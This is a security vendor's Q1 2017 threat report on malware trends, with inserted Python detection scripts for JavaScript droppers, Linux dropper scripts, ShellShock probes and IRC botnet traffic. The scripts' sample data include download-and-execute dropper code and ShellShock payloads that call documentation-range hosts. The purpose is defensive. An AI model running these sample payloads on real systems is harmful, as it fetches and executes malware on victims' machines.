
QUARTER 1, 2017

Internet Security Report

Internet Security Report: Q1 2017 • 2

Contents

03 Introduction
04 Executive Summary
05 Firebox Feed Statistics
07 Malware Trends
08 Quarter-over-Quarter Malware Comparison
08 Malicious JavaScript Still Menaces
09 A Rise in Linux Malware
11 Evil Cross-platform Java Malware
11 Old Attacks: Malicious Perl Bot
12 A Pair of Generic Windows Trojans
12 Malicious Macros Hide in the Weeds
13 Geographic Malware Distribution
14 Zero Day vs Known Malware
15 Network Attack Trends
15 Top Network Attacks
16 Quarter-over-Quarter Attack Comparison
16 Web Battleground Shifts to Servers
16 Web Application Attacks Move Up
17 StageFright Returns to the Spotlight
18 Geographic Attack Distribution
20 Firebox Feed Statistics: Defense Learnings
20 Malicious JavaScript in Email
20 Web-based Linux Malware
20 Brazilian Banking Malware Campaign
21 Top Security Incidents
22 The CIA Vault 7 Leaks
25 Marble Framework Defense Learnings
26 WatchGuard Threat Lab’s IoT Research Project
27 Responsible Disclosure: Ouvis C2 HD Security Camera
31 IoT Research: Defensive Learnings
32 Conclusion & Defense Highlights


The Firebox® Feed provides quantifiable data and trends about hackers’ latest attacks, and understanding these trends can help us improve our defenses.

Introduction

Have you ever wondered what types of cyber attacks affect small to midsize businesses (SMBs) and distributed enterprises (DEs)? Well, you’ve come to the right place.

WatchGuard’s Internet Security Report is based on Firebox Feed data coming from more than 26,000 unified threat management (UTM) appliances that are monitoring and protecting SMBs and distributed enterprises around the world. This data gives us insights into what types of network exploits, malware infections, and advanced attacks cyber criminals launch every month, and how they change and update their attacks over time. We share these trends and insights with you every quarter in our Internet Security Report.

The report for Q1 2017 includes:

1. Many trends and discoveries from the Firebox Feed. What types of malware do we catch most often in the wild? Which network services do attackers commonly target? What are the most popular attacks in different regions of the world? Which delivery mechanisms do cyber criminals most regularly rely on? You can learn all this and more in our Firebox Feed Statistics section.

2. Top Story: CIA Vault 7 leaks. Every quarter, you’re flooded with interesting and relevant information, security stories and incidents. Some of them can have industry-wide effects. This quarter our researchers comment on the CIA Vault 7 leak from Q1 2017 and share some additional technical analysis you didn’t see in the news.

3. Latest Internet of Things (IoT) research. The WatchGuard Threat Lab constantly runs security research projects to study the threats and issues affecting businesses today. For the last few quarters, our researchers have been analyzing the security of consumer IoT devices. This quarter we disclose a vulnerability we found in the Ouvis C2 HD Security Camera.

4. Most importantly, defensive learnings. While some might consider the threat landscape interesting on anecdotal merit alone, you can put these trends and learnings to good use. We share these trends and findings so that you can tailor your defenses to the latest attacks. We share various protective tips throughout this report, and summarize with our top learnings.

We’re excited to share our second report based on data analysis from our Firebox Feed, and our additional research projects. We believe this quantifiable data gives us a deeper insight into the most prevalent threats our customers face and how cyber criminals craft their latest attacks. Our quarter-over-quarter analysis also shows how attackers evolve their techniques and focuses over time. We hope this report provides useful information, and that you make it a regular part of your InfoSec awareness and training. Thanks for joining us this quarter, and read on for our latest threat landscape findings.

Executive Summary

Even when malware declines, other attacks rise. Consumers and businesses are under a constant deluge of network attacks, phishing, and malware. Criminals target Brazilian banks, nation-states anonymize their tools, and advanced threats get past legacy defenses. If you want to keep your business online, you need to stay vigilant against these attack trends so you can identify defenses for them.

This report provides some details around those and other trends. Here’s a high-level summary of some of the things you’ll learn from this report:

• Linux malware is on the rise, making up 36% of the top malware we detected in Q1 (if you count PERL/ShellBot). We believe this increase comes from attackers targeting IoT devices.

• Legacy AV missed 38% of malware. In Q4, signature-based AV missed 30% of the threats we caught overall. This quarter, that miss rate rose by 8 percentage points despite a general decline in malware detection overall. This means increasingly more malware evades traditional AV solutions.

• Threat actors take a break from hacking the holidays. Overall, malware volume decreased 52% in Q1 2017 compared to Q4 2016. We believe the drop in malware detections can be attributed to the absence of seasonal malware campaigns associated with various Q4 holidays, which increased overall malware instances during that period.

• Conversely, network attacks are up 37% compared to Q4, likely due to automated tools that constantly look for new victims.

• The web battleground shifted towards web servers. Last quarter, we saw more exploits that were used for drive-by downloads (web client attacks). In Q1, 82% of the top network attacks targeted web servers (or other web-based services).

• Our top ten XSS attack primarily targeted Spain. We aren’t sure why this particular cross-site scripting exploit was popular in Spain, but it was.

• Attackers still exploit the Android StageFright flaw. A mobile device vulnerability cracked our top ten attack list this quarter, breaking the previously unchallenged web attack theme.

• Criminals target Brazilian banks with cross-platform malware. We detected a large amount of email-based Java malware sent to victims in Brazil. We suspect this is part of the well-known Banload banking malware campaign.

Those are just a few of the many trends this report explores. Read on for more in-depth explanations and

In Q1 2017, WatchGuard blocked over 4,151,210 network attacks (156 per device*) and 7,072,178 malware variants (266 per device*).

* average per participating device

Firebox Feed Statistics

WatchGuard’s Firebox Feed provides quantifiable data about the latest malware and network attacks globally. The feed is a database of anonymized threat data gathered from tens of thousands of active Fireboxes around the globe. It records the latest malware from our Gateway AntiVirus (GAV) and APT Blocker services, and it archives the most prevalent network attacks blocked by our Intrusion Prevention Service (IPS). It also records location data to learn how different threats affect different geographic regions. It doesn’t, however, capture any sensitive data about our customers’ networks or configurations, and it allows customers to opt out of this feed whenever they like.

The Firebox Feed currently only captures data from a fraction of our customers, since it relies on customers running the latest versions of our firmware. However, with information from over 26,000 devices, the Firebox Feed provides a statistically relevant view into today’s threats.

The threat landscape does not stand still. Cyber criminals constantly change their tools, tactics, and campaigns to exploit the most opportune attack techniques of the time. Savvy attackers pay attention to seasonal events, pop culture, and other technological trends to leverage the latest tricks to hack more victims. To keep up your defenses, you must remain aware of the latest threat trends. Using this report, you can fine-tune your defenses to block the latest threats.

This section of the report highlights the malware and network attack trends our Firebox Feed uncovered in Q1 2017. Here we share our analysis of these trends, and provide defense tips that help you avoid the latest malware and attacks.

Malware Trends

Most cyber attacks involve malware. After breaching your network, criminals usually want to establish “persistence,” meaning they want to find a way to retain access to your computer and network. Typically, they install malware to retain this persistence. This section details the malware-specific trends from our Q1 2017 data.

Our malware data comes from two Firebox services:

• The basic Gateway AntiVirus (GAV) service, which uses signatures and static heuristics to catch known malware.

• APT Blocker, our advanced malware prevention service, which uses behavior detection to catch new or “zero day” malware.

Let’s start with the raw Q1 2017 numbers:

• The Firebox Feed recorded threat data from 26,584 active Fireboxes; a 7.7% increase over the number of devices reporting in Q4 2016.

• Our GAV service blocked 7,072,178 malware variants; representing an average of 266 malware samples blocked per Firebox. This represents a 52% decline in overall malware compared to last quarter, and a 56% decline in malware blocked per Firebox.

• APT Blocker stopped an additional 2,568,727 malware variants; representing a 34% decline from last quarter.

Looking at those numbers, the first thing you notice is that malware detection dropped by about half, despite the Firebox Feed having almost two thousand more devices reporting in. Why is that?

We suspect this decline has to do with the seasonality of malware campaigns. The last quarter of the year includes many regional and global holidays, such as Thanksgiving and Christmas. Many of these holidays involve major shopping periods and retail events like Cyber Monday and Black Friday. Due to this increased spending, attackers specifically target these holiday and shopping periods, which probably accounts for the higher malware rates last quarter. As we continue this report each quarter, we’ll follow this trend to see if holiday-related malware increases recur year-over-year.

Besides the obvious decrease in overall malware, we also noticed a relative increase in advanced malware. While APT Blocker detections decreased in Q1, they decreased relatively less than GAV detections did (a 34% decline compared to GAV’s 52%). In general, that means more malware got past legacy AV this quarter, and required advanced malware detection techniques to block. This seems to suggest that more threat actors are actively creating malware that evades legacy protections.

Figure 1: Top Ten Firebox GAV Hits for Q1 2017

 #  CATEGORY                  THREAT NAME           COUNT
 1  Generic Dropper           FakeAlert             670,261
 2  PERL IRC Bot              PERL/ShellBot         356,809
 3  Malicious JavaScript      JS/Downloader.Agent   256,390
 4  Generic Linux Trojan      Linux/Exploit         178,551
 5  Generic Trojan            Win32/Heur            165,996
 6  Generic Linux Downloader  Linux/Downloader      158,689
 7  Malicious JavaScript      JS/Heur               156,645
 8  Generic Java Downloader   Java/Downloader        83,123
 9  Generic Linux DDoS Tool   Linux/Flooder          82,127
10  Generic Bitcoin Miner     Generic36.AAVT         77,704

Rather than analyzing these ten samples individually, we’ll share the high-level trends they represent, and go into more detail about some of the samples.

Quarter-Over-Quarter Malware Analysis

Only four of the malware samples from our Q4 2016 report made it to this quarter’s top ten. Specifically:

• FakeAlert
• Linux/Exploit
• JS/Downloader.Agent
• JS/Heur

Two of those threats traded places for relevance. Last quarter, Linux/Exploit was the number one threat, and a good indicator of increased IoT attacks. This quarter, it’s still relevant, but has dropped below FakeAlert, which took over the top spot. If you’d like to know more about either of these two samples, see the malware section of last quarter’s Internet Security Report. Meanwhile, the top JavaScript threats from last quarter remain as relevant this quarter, which we detail next.

Malicious JavaScript Still Menaces

JavaScript is a high-level scripting language most commonly used on dynamic websites. While web applications legitimately use JavaScript, attackers commonly abuse it to help deliver malware. Specifically, criminals tend to use malicious JavaScript in two ways; either as malicious code embedded on a website, or as malicious files sent via email.

For the second quarter in a row, JavaScript malware made up a large portion of the Firebox Feed top statistics. Like last quarter, JS/Downloader.Agent and JS/Heur both made our top ten list. Furthermore, we continued to see many other malicious JavaScript samples throughout our full top 100. In short, our malware services block a lot of malicious JavaScript.

As mentioned before, malicious JavaScript is either hosted directly on a malicious website to facilitate drive-by download attacks, or delivered as an attachment in a convincing phishing email. In the email scenario, JavaScript malware typically acts as the first-stage dropper in a multi-stage attack. Malware authors hope their victims run the malicious JavaScript so it can download the second-stage malware, which might be ransomware or a remote access trojan (RAT).

In the case of web attacks, criminals use JavaScript to launch browser and software exploits. In fact, some of the samples our Fireboxes detected are associated with web-based exploit kits like Angler, Neutrino, and RIG, which have previously delivered ransomware like Locky and Nemucod.

Our data shows that malicious JavaScript plays a big role in modern malware delivery, both over the web and through email. Make sure you have security controls that can identify malicious JavaScript, including web reputation and advanced malware protection services. We also encourage advanced users to look into browser extensions like NoScript and SafeScript, which can help you limit JavaScript while also letting legitimate sites work. Finally, make sure your users know never to open .JS files from an email.

Network vs Endpoint Malware Detection: To evade detection technologies, modern malware arrives in multiple stages. Rather than directly sending you ransomware, attackers might send you a document, that links to a website, that opens a malicious Java file, that installs a dropper or downloader, which finally downloads the actual ransomware onto the endpoint. This means network AV solutions detect and block malware at different stages in this delivery process than endpoint AV. Network AV primarily “sees” the initial droppers and downloaders from the initial infection stages, whereas endpoint AV may see the final malware. For more on multi-stage malware, see this great post from IBM X-Force.
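The email scenario above, as an added example that is not code from this report: a small Python scanner for inbound attachments that unpacks a ZIP one level deep, flags script extensions (including double extensions such as Invoice.pdf.js) and looks for the Windows Script Host download-write-execute chain that first-stage JavaScript droppers rely on. The indicator regexes, the three-hit threshold, the file names and the 198.51.100.77 URL are assumptions constructed for the example.

```python
"""Flag first-stage JavaScript droppers in email attachments (added example)."""
import io
import re
import zipfile

SCRIPT_EXTENSIONS = (".js", ".jse", ".wsf", ".vbs", ".hta")

# Windows Script Host idioms a JavaScript dropper needs to fetch and run a second stage.
# Indicator list and thresholds are assumptions for this example.
WSH_INDICATORS = {
    "http_client": re.compile(
        r"ActiveXObject\s*\(\s*[\"'](MSXML2\.(Server)?XMLHTTP|WinHttp\.WinHttpRequest)", re.I),
    "file_write": re.compile(r"ActiveXObject\s*\(\s*[\"']ADODB\.Stream", re.I),
    "shell_exec": re.compile(r"WScript\.Shell|ShellExecute|\.Run\s*\(", re.I),
    "temp_path": re.compile(r"%TEMP%|ExpandEnvironmentStrings", re.I),
    "exe_payload": re.compile(r"\.exe[\"']", re.I),
}


def scan_file(filename, data):
    """Return a finding for one file, or None if nothing about it looks like a dropper."""
    lower = filename.lower()
    is_script = lower.endswith(SCRIPT_EXTENSIONS)
    double_ext = is_script and lower.count(".") >= 2       # e.g. Invoice.pdf.js
    text = data.decode("utf-8", errors="replace")
    hits = sorted(name for name, rx in WSH_INDICATORS.items() if rx.search(text))
    if not is_script and not hits:
        return None
    if len(hits) >= 3:
        verdict = "dropper"            # fetch + write + execute chain present
    elif is_script:
        verdict = "blocked_extension"  # script attachment, block regardless of content
    else:
        verdict = "suspicious"
    return {"file": filename, "script_extension": is_script,
            "double_extension": double_ext, "indicators": hits, "verdict": verdict}


def scan_attachment(filename, data):
    """Scan one attachment; ZIP archives are unpacked one level deep."""
    findings = []
    if zipfile.is_zipfile(io.BytesIO(data)):
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            for member in zf.infolist():
                if member.is_dir():
                    continue
                finding = scan_file(filename + "/" + member.filename, zf.read(member))
                if finding:
                    findings.append(finding)
    else:
        finding = scan_file(filename, data)
        if finding:
            findings.append(finding)
    return findings


# Constructed sample: a ZIP carrying a double-extension JS dropper next to a harmless text file.
# The URL and file names are made up for this example.
DROPPER_JS = r"""
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", "http://198.51.100.77/update.php", false); x.send();
var s = new ActiveXObject("ADODB.Stream"); s.Type = 1; s.Open(); s.Write(x.responseBody);
var p = new ActiveXObject("WScript.Shell").ExpandEnvironmentStrings("%TEMP%") + "\\svc.exe";
s.SaveToFile(p, 2); new ActiveXObject("WScript.Shell").Run(p);
"""


def build_sample_zip():
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("Invoice_2017.pdf.js", DROPPER_JS)
        zf.writestr("README.txt", "Thank you for your order.")
    return buf.getvalue()


if __name__ == "__main__":
    for finding in scan_attachment("Invoice.zip", build_sample_zip()):
        print(finding)
```

The extension check matters on its own: a gateway that blocks .JS attachments outright stops the first stage even when the script is obfuscated enough to carry none of the content indicators.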

A Rise in Linux Malware

At least three of the top ten malware samples this quarter target Linux, showing that cyber criminals are focusing on this platform, likely for IoT-related attacks.

Last quarter, Linux/Exploit was the number one malware sample blocked. While it dropped to number four this quarter, it’s joined by two other Linux threats; Linux/Downloader and Linux/Flooder. Combined, these three hits show attackers are increasingly targeting Linux systems.

Here’s a quick description of each threat:

1. Linux/Exploit is a generic detection rule that catches several executable Linux (ELF) trojans. You can read more about it in our last report. In general, these trojans infect a device, and then scan networks looking for any other devices hosting Telnet or SSH services. Once the Telnet or SSH host devices are identified, the trojan attempts to log in to them using default credentials or via brute force. Once they have access, they hijack the device by either downloading a copy of a malicious Linux executable (which could be Linux/Exploit) or by running a script to add the host to a growing botnet (as the Mirai botnet did).

RECENT SAMPLES: c9c50c4b28d5209c2366ac4ec531ae0c, a3b3572cccac880e33420316562814ce, e9b5716cac7e5e0df3a209456294a34c
ALTERNATE NAMES: Linux.CornelGEN

2. Linux/Downloader joined the top ten malware list this quarter. Linux/Downloader is a signature that generically catches common Linux dropper or downloader shell scripts. Rather than catching malicious Linux executables (ELF files) like Linux/Exploit, this signature catches the malicious shell scripts that some attackers (or trojans) run to download and install additional malware onto a hijacked Linux device.

Linux runs on many different architectures, such as ARM, MIPS, and traditional x86 chipsets. An executable compiled for one architecture will not run on a device running a different one. Thus, some Linux attacks use dropper shell scripts to download and install the proper malicious components for the architecture they are infecting. Figure 2 shows a sample of one of the many Linux downloader scripts caught by this signature.

Figure 2: Example of malicious Linux shell script caught by Linux/Downloader

RECENT SAMPLES: 78fae3e208de3bbadabe09f4996f0b44, cac62e5664152a357145747ba5dbe0a2, 9a539a2aec2a815218abdf5c35b10c33, c92a0be3ff38cd24478ffcf8e35099c3, 1a3029ed85c90411668583a9e271f0f5
ALTERNATE NAMES: Linux/TrojanDownloader, Linux/ShellDLoader, Trojan-Downloader.Shell.Agent, Script.Trojan.Agent

3. Linux/Flooder also joined the Q1 top ten malware list. This is another generic signature that catches Linux-based distributed denial of service (DDoS) tools. For instance, it catches tools like the publicly released Tsunami tool. Tsunami is a command line Linux tool designed to carry out DNS amplification attacks. It’s based on an open source DNS relay scanner called namescan. This is one of the many possible Linux-based CLI DDoS tools.

Linux/Flooder may also catch the DDoS tools used by Linux-based botnets, like Mirai. As the Mirai botnet showed us, Linux-based IoT devices are a prime target for botnet armies. These networked trojans often include tools for DDoS attacks, as shown in Figure 3.

RECENT SAMPLES: 3c0e9dbc29b74445664814b10b2ced82, bb326e31fdfc533e3e5293df13bb091a, e64079b3ccf906204474beca1f5cc41d, cc38121ea8efc86bcc5d446e2f7e4198
ALTERNATE NAMES: Dos.Linux.Agent, Linux.Flood, Trojan.Linux.Flooder, Linux/Dnsamp, Linux.BackDoor.Tsunami

As an aside, one might argue that the PERL/ShellBot variant we describe below also qualifies as Linux malware, since it primarily targets Linux systems. This is because they tend to have Perl installed by default. However, we decided to leave it out of this section, and describe it in more detail later in this report.

In summary, Linux attacks and malware are on the rise. We believe this is because systemic weaknesses in IoT devices, paired with their rapid growth, are steering botnet authors towards the Linux platform. Owners of Linux-based devices, including IoT hosts and traditional Linux servers, should ensure they properly secure their systems from external attacks. Blocking inbound Telnet and SSH, along with using complex administrative passwords, can prevent the vast majority of potential attacks.

Figure 3: Mirai Command and Control Server
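The multi-architecture dropper script described under Linux/Downloader, as an added example that is not code from this report: a Python heuristic scanner that scores a shell script on the traits those droppers share (a loop over CPU names, a download tool, hopping to a writable directory, chmod plus execution of the fetched file, and self-cleanup). The indicator regexes, the architecture list, the scoring thresholds, and both sample scripts (with the documentation address 198.51.100.23) are constructed assumptions; a real signature such as Linux/Downloader is not reproduced here.

```python
"""Heuristic scanner for multi-architecture Linux dropper shell scripts (added example)."""
import re

# CPU names IoT droppers iterate over when they do not know the target's architecture.
ARCH_TOKENS = {"mips", "mipsel", "mpsl", "arm", "arm5", "arm6", "arm7", "armv7l",
               "x86", "x86_64", "i586", "i686", "ppc", "sh4", "m68k", "sparc"}

# Assumed indicators; each is one regex over the whole script text.
INDICATORS = {
    "downloader": re.compile(r"\b(wget|curl|tftp|ftpget)\b"),
    "writable_dir_hop": re.compile(r"\bcd\s+/(tmp|var/run|var/tmp|dev/shm|mnt)\b"),
    "chmod_exec": re.compile(r"\bchmod\s+(\+x|[0-7]{3,4})\b"),
    "runs_download": re.compile(r"(?m)(^\s*|[;&|]\s*)\./\S+"),   # executes ./something
    "cleanup": re.compile(r"\brm\s+-r?f\b"),
}


def scan_script(text):
    """Score a shell script; returns the indicators found, the architectures named and a verdict."""
    words = re.findall(r"[A-Za-z0-9_]+", text)
    archs = sorted({w for w in words if w.lower() in ARCH_TOKENS})
    found = {name: bool(rx.search(text)) for name, rx in INDICATORS.items()}
    found["multi_arch"] = len(archs) >= 3          # assumed threshold
    score = sum(found.values())
    if found["multi_arch"] and found["downloader"] and (found["chmod_exec"] or found["runs_download"]):
        verdict = "likely_dropper"
    elif score >= 3:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": found, "architectures": archs, "score": score, "verdict": verdict}


# Constructed sample in the style of the scripts the text describes (not a real sample).
SAMPLE_DROPPER = """#!/bin/sh
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
for a in mips mipsel arm arm7 x86 x86_64 ppc sh4; do
  wget http://198.51.100.23/bins/bot.$a -O bot.$a
  chmod +x bot.$a
  ./bot.$a
done
rm -rf bot.*
"""

# Constructed benign installer: one download, integrity check, no architecture loop.
BENIGN_INSTALLER = """#!/bin/sh
set -e
curl -fsSL https://example.org/releases/tool-1.2.tar.gz -o /tmp/tool.tar.gz
echo "EXPECTED_SHA256  /tmp/tool.tar.gz" | sha256sum -c -
tar -xzf /tmp/tool.tar.gz -C /opt/tool
"""

if __name__ == "__main__":
    for name, script in (("dropper", SAMPLE_DROPPER), ("installer", BENIGN_INSTALLER)):
        print(name, scan_script(script))
```

The architecture loop is the strongest single signal: legitimate installers fetch one artifact for the host they run on, while a dropper that cannot fingerprint its victim downloads and tries every build until one executes.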

Evil Cross-platform Java Malware

Java is a general-purpose programming language that is designed to run on many platforms. Originally created by Sun Microsystems (now owned by Oracle), Java is one of the most popular programming languages used today. Everything from web applications, to mobile devices, to normal client software uses Java. People often confuse Java with JavaScript, but they are quite different. JavaScript is a high-level, runtime scripting language.

Unfortunately, Java has also developed a reputation for insecurity. Over the years, researchers have found countless vulnerabilities in the Java platform, many of which allow attackers to bypass its built-in sandbox, which is there to protect users. Furthermore, sophisticated attackers are drawn to Java because it runs equally well on Windows, Mac, and Linux devices. Attackers use Java downloaders in cross-platform attacks.

While Java threats were very common a few years ago, this is the first time we’ve seen a Java threat make our top ten list. Java/Downloader is a universal signature that detects generic Java downloaders. These bits of malicious code try to fingerprint a victim’s operating system (OS), and then install the corresponding malicious payload.

The most recent samples caught by Java/Downloader are associated with a cross-platform trojan called Banload, which targets South American banks. This banking trojan infects both Windows and Macintosh computers using this malicious Java code. Our geographic data confirms this increase likely relates to a South American bank attack campaign. We’ll share more about this in our Geographic Distribution section.

JAVA/DOWNLOADER INFO:
• Generic Java downloader
• Related to banking malware (Banload)
• Sample hashes: 2c1189b57ff0cfdd18618f51955df8f1, cb6d19921c635683798b4dcc86fe607f, 4478732742b8ccbf252cbb71766eb86, f27b92b58f510932cd117c4248955c9, e9d0672646d0478b0b3a8a3d334ee32, ccfcf52d14a07e2d7fb780809e6b6b73
• Alternate names: Java.Trojan.Generic, Java:Malware-gen, Java/Banload.U, Mal/DrodZp-A, TrojanDownloader.Java

Old Attacks: Malicious Perl Shellbots

Last quarter, an old-style threat called a PHP webshell made our top ten malware list. This quarter that threat dropped entirely off our top 100 list, only to be replaced with another outdated threat: PERL/ShellBot.

PERL/ShellBot is a broad signature made to detect malicious bots written in Perl (a high-level programming language). Though Perl bots can run on any platform with Perl installed, they tend to affect Linux computers because those often have Perl installed by default.

These malicious bots use the Internet Relay Chat (IRC) service as a command and control (C&C) channel for the attacker. Some of these malicious Perl shellbots connect to IRC using the default port, 6667. However, others use non-standard IRC ports like 23 or 3333, presumably to help avoid detection by controls that only look at port numbers.

Like a normal botnet, attackers can leverage Perl bots for just about any nefarious purpose, including but not limited to DDoS attacks. Source code for many Perl shellbots has leaked publicly, resulting in many variants based on the originals. Figure 4 shows one such sample, hosted publicly on GitHub, that is used for DDoS attacks.

PERL/SHELLBOT INFO:
• Perl-based IRC bot
• Related to ShellShock attack
• Sample hashes: 59b0f479a5ad937dd9d61635c4c855bc, 66d85817e183b3e5120149721d3fcc19, 1d37072882034f5a015fd3430f8169a7, 8a838c86c038713b083b6fc07208ebc3, fe3323a44f0f536b94947dce2b229fc4
• Alternate names: Backdoor.Perl.Shellbot, Unix/ShellBot, Trojan.Perl.Shellbot

Figure 4: Example of publicly available DDoS Perl bot

In late 2014, a critical Linux Bash vulnerability surfaced called ShellShock. Bash executed commands appended to function definitions passed in through environment variables, so any service that handed attacker-controlled input to Bash (most commonly web servers running CGI scripts) let attackers run arbitrary commands with that service’s privileges. At the time, attackers updated their malicious Perl bots to target this ShellShock vulnerability. Some of the samples we see associated with recent PERL/ShellBot detections are targeting this ShellShock vulnerability. If you haven’t already patched your Linux systems for ShellShock, you should do so immediately.
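The two halves of the Perl shellbot story above (the ShellShock probe that plants the bot, then the IRC command and control session that may run on port 23 or 3333 rather than 6667) as one added detection example that is not code from this report. The first function parses combined-format web server log lines and extracts the command appended to a Bash function-definition prefix; the second classifies connections as IRC by the protocol commands in their payload instead of by destination port, and flags sessions on non-standard ports. The log lines and flow records are constructed from documentation address ranges, and the command list and the two-command threshold are assumptions.

```python
"""Spot ShellShock probes in web logs and IRC C2 sessions on any port (added example)."""
import re

# Apache/nginx "combined" log format: ip ident user [time] "request" status size "referer" "agent".
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<user_agent>[^"]*)"$')

# Bash function-definition prefix: the original "() { :;};" form (CVE-2014-6271) and the
# "() { _; } >_[$($())]" form (CVE-2014-6278) that slipped past the first patch.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*(?:;|>_\[[^\]]*\])")


def find_shellshock_probes(log_lines):
    """Return one finding per header field carrying a ShellShock prefix, with the appended command."""
    findings = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("request", "referer", "user_agent"):
            hit = SHELLSHOCK_RE.search(m.group(field))
            if hit:
                findings.append({"ip": m.group("ip"), "field": field,
                                 "command": m.group(field)[hit.end():].strip()})
    return findings


# IRC registration/channel commands at the start of a line; matched on content, not port.
IRC_CMD_RE = re.compile(r"^(NICK|USER|JOIN|PASS|PRIVMSG|PING|PONG|MODE)\b", re.M)
IRC_PORTS = set(range(6660, 6670)) | {6697}


def find_irc_c2(flows):
    """flows: (src, dst, dst_port, first payload bytes). Two or more IRC commands = IRC session."""
    findings = []
    for src, dst, port, payload in flows:
        cmds = set(IRC_CMD_RE.findall(payload.decode("latin-1")))
        if len(cmds) >= 2:
            findings.append({"src": src, "dst": dst, "port": port,
                             "nonstandard_port": port not in IRC_PORTS,
                             "commands": sorted(cmds)})
    return findings


# Constructed sample data (documentation IP ranges; no real hosts).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Mar/2017:10:21:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" '
    '"() { :;}; /bin/bash -c \'wget http://198.51.100.45/x.pl -O /tmp/x.pl; perl /tmp/x.pl\'"',
    '198.51.100.9 - - [12/Mar/2017:10:22:41 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 312 '
    '"() { _; } >_[$($())] { echo Content-Type: text/plain; id; }" "curl/7.47.0"',
    '192.0.2.44 - - [12/Mar/2017:10:23:05 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" '
    '"Mozilla/5.0 (X11; Linux x86_64)"',
]
SAMPLE_FLOWS = [
    ("10.0.0.12", "198.51.100.45", 6667, b"NICK [x]9711\r\nUSER x 8 * :x\r\nJOIN #sh\r\n"),
    ("10.0.0.12", "198.51.100.46", 3333, b"PASS secret\r\nNICK bot8823\r\nUSER bot * * :bot\r\n"),
    ("10.0.0.17", "203.0.113.5", 23, b"\xff\xfb\x01\xff\xfb\x03login: "),            # real telnet
    ("10.0.0.17", "203.0.113.9", 23, b"NICK [m]4417\r\nUSER m 8 * :m\r\nJOIN #mm\r\n"),  # IRC on 23
    ("10.0.0.20", "192.0.2.8", 80, b"GET / HTTP/1.1\r\nHost: www.example.com\r\n\r\n"),
]

if __name__ == "__main__":
    for f in find_shellshock_probes(SAMPLE_LOG) + find_irc_c2(SAMPLE_FLOWS):
        print(f)
```

Note that the telnet session on port 23 is not reported while the IRC session on the same port is; a rule keyed on port 6667 alone would have seen neither the port 23 nor the port 3333 bot.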

A Pair of Generic Windows Trojans

To round out our top ten list, we also saw a pair of signatures that catch generic Windows trojans.

• Win32/Heur is about as generic a signature as you get, and is known to catch many Windows-based trojans, from Zbot and Zeus to Razy.

• Generic36.AAVT is also a broad signature that catches Windows-specific malware. However, it’s more specifically associated with Bitcoin Miner trojans. This suggests a slight uptick in attackers delivering Bitcoin mining malware in some regions.

Malicious Macros Hide in the Weeds

Unlike last quarter, malicious macro-based Word documents did not make our top ten list. There was a clear decline in overall malicious macro documents in Q1. However, they’re still worth mentioning since we see these malicious documents sprinkled throughout our wider top 100 list.

Despite their decline, we recommend you continue to warn your users against unsolicited documents, and tell them not to enable macros if they do open strange documents. See our last report for more information on this waning threat.

Geographic Malware Distribution

Figure 5: Malware detection by region (EMEA 56.6%, Americas 21.8%, APAC 21.6%)

Overall, we see more malware blocked in EMEA than anywhere else, with over 56% of malware caught in this region. This continues the same overall regional trend from last quarter. While this could have to do with the sales and licensing of our products (APT Blocker is popular in Europe), it could also suggest criminals are launching more European malware campaigns.

Our regional trends change for the remaining percentage of malware though. Last quarter, most of the remaining malware affected the Americas, with only 6% of malware found in APAC. This quarter, the remaining malware is split evenly between the Americas and APAC, at approximately 22% each. This marks a significant increase in threats affecting the Asia-Pacific.

We also saw quite a few standout geographic trends for individual malware variants:

1. We primarily found PERL/ShellBot in two countries. 53% of the hits were found in Malaysia, 36.7% were found in the United States, and the remaining 10.3% was distributed throughout eleven other countries. It’s unclear why these Perl bots are primarily targeting Malaysia and the United States.

2. 84% of Win32/Heur was found in India.

3. The generic Bitcoin miner (Generic36.AAVT) primarily targeted Canada, with 95% of the detections.

4. 97% of our Java/Downloader detections were from Brazil, confirming this threat is associated with a known banking malware campaign targeting Brazilian banks.

5. The Linux threats display a wide range of geographic curiosities.

a. Linux/Exploit affected many European and American countries, but had the highest numbers in the U.S. and the United Arab Emirates.

b. Linux/Downloader mostly affected Germany, Great Britain, and Malaysia, but few others to the same extent.

c. Finally, Linux/Flooder primarily affected Germany and France.

6. The JavaScript malware was found in a wide range of countries, but Germany always led the list.

7. Though FakeAlert was found in over 100 countries, 44% came from Italy.

Malware affects all countries to some extent, but it is interesting to see certain threats only affect specific countries or regions. Pay close attention to the most prominent threats by region, and consider adjusting your defenses accordingly.

Zero Day vs Known Malware

As mentioned in the sidebar above, Firebox customers can also use our optional APT Blocker service to catch more advanced malware. APT Blocker runs suspicious files in a next-generation cloud sandbox, and monitors their behaviors to identify zero day malware that would be missed by signature-based detection solutions. When our GAV service doesn’t detect anything bad, our Firebox can still run additional APT Blocker checks to find brand new threats. By definition, if APT Blocker catches a threat, signature-based GAV missed it. By comparing these two services, you get a good idea of the ratio between newer “zero day malware,” which legacy AV solutions might miss, and known malware.

That said, not all our customers have APT Blocker. For a one-to-one comparison, we count the total GAV hits only on boxes that have APT Blocker. According to our Firebox Feed, GAV found 4,198,242 known malware variants on boxes that also had APT Blocker. Meanwhile, APT Blocker prevented 2,568,021 new malware variants on these same devices. This means at least 38% of the malware our systems discovered (2,568,021 of the 6,766,263 total detections on those boxes) was zero day, and missed by legacy AV solutions.

This illustrates the critical importance of advanced, behavioral-based malware detection solutions today. Without them, AV solutions could miss more than one third of the malware spreading online. This is why so many networks that use basic AV become victims of threats like ransomware. We highly recommend you leverage advanced malware solutions like WatchGuard’s APT Blocker.

Figure 6: Known vs Zero Day Malware (38% of malware was zero day)

Network Attack Trends

